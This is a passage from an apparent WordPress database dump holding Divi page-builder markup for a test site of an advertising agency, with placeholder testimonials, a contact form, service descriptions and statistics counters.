portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:42:14','2020-08-07 14:42:14','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(485,1,'2020-08-07 14:51:03','2020-08-07 14:51:03','packaging design creative advertising agency','packaging design creative advertising agency','','inherit','open','closed','','800x800-1','','','2021-03-18 06:25:15','2021-03-18 06:25:15','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg',0,'attachment','image/jpeg',0),(486,1,'2020-08-07 14:51:05','2020-08-07 14:51:05','Creative graphic designing by best advertising creative marketing agency.','Creative graphic designing','','inherit','open','closed','','800x800','','','2021-03-18 06:24:43','2021-03-18 06:24:43','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg',0,'attachment','image/jpeg',0),(487,1,'2020-08-07 14:51:43','2020-08-07 14:51:43','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" 